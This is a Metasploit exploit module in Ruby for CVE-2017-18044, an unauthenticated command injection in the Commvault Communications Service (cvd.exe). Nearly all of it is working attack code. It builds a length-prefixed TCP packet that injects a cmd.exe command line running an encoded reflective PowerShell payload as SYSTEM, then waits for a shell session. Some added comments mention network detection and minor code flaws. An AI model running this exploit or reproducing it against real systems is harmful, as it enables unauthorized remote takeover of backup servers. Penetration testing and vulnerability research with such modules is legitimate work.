##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for CVE-2017-18044 (see 'References' below): an
  # unauthenticated command injection in the Commvault Communications Service
  # (cvd.exe). The module opens one plain TCP connection to the service
  # (RPORT defaults to 8400), writes a single length-prefixed message whose body
  # carries a cmd.exe command line, and then waits for the payload's session.
  # Nothing in the exchange is encrypted, so the embedded cmd.exe path and the
  # powershell command line appear in clear text on the wire -- useful for
  # network detection of this technique.
  Rank = GoodRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell

  # Registers the module's metadata and options with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Commvault Communications Service (cvd) Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability
          discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
          and v10). The vulnerability exists in the cvd.exe service and allows an
          attacker to execute arbitrary commands in the context of the service. By
          default, the Commvault Communications service installs and runs as SYSTEM in
          Windows and does not require authentication. This vulnerability was discovered
          in the Windows version. The Linux version wasn't tested.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
        ],
        'References' => [
          ['CVE', '2017-18044'],
          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
        ],
        'Platform' => 'win',
        'Targets' => [
          [
            'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
            {
              'Arch' => [ARCH_X64, ARCH_X86]
            }
          ],
        ],
        # 'Privileged' reflects the description above: the service runs as SYSTEM.
        'Privileged' => true,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2017-12-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Only the service port is configurable; 8400 is the default used here.
    register_options([Opt::RPORT(8400)])
  end

  # Framework entry point: builds the message, sends it over a single TCP
  # connection, hands control to the payload handler, then closes the socket.
  # No response from the service is read or checked, so a failed injection is
  # only noticed when no session arrives.
  def exploit
    buf = build_exploit
    print_status("Connecting to Commvault Communications Service.")
    connect
    print_status("Executing payload")
    # Send the payload
    sock.put(buf)
    # Handle the shell
    handler
    disconnect
  end

  # Builds the length-prefixed message written to the service socket.
  #
  # Layout (all integers packed with 'I>', i.e. 32-bit big-endian):
  #   4-byte length of the body, then the body consisting of 8 bytes of
  #   framework-generated filler, the message type (9), 328 more filler bytes,
  #   the cmd.exe command line, a NUL terminator and a trailing zero word.
  #
  # @return [String] the complete binary message
  def build_exploit
    # Get encoded powershell of payload
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
    # Remove additional cmd.exe call
    psh = "powershell"
    idx = command.index(psh)
    # NOTE(review): if cmd_psh_payload ever returns a string without "powershell",
    # idx is nil and the slice below raises TypeError instead of failing cleanly.
    command = command[(idx)..-1]

    # Build packet
    cmd_path = 'C:\Windows\System32\cmd.exe'
    msg_type = 9
    zero = 0
    # NOTE: from this assignment on, `payload` is a local String that shadows the
    # module's payload accessor; the accessor was already consumed above via
    # payload.encoded, so the shadowing is harmless but easy to misread.
    payload = ""
    payload += make_nops(8) # presumably padding; generated by the framework's NOP generator
    payload += [msg_type].pack('I>')
    payload += make_nops(328)
    payload += cmd_path
    payload += ";"
    payload += ' /c "'
    payload += command
    payload += '" && echo '
    payload += "\x00" # NUL terminates the command string
    payload += [zero].pack('I>')

    # Add length header and payload
    # NOTE(review): String#length counts characters, not bytes; it matches the
    # byte count only while the buffer stays binary/ASCII-only. bytesize would be
    # the unambiguous choice for a wire-format length field.
    ret_data = [payload.length].pack('I>')
    ret_data += payload

    ret_data
  end
end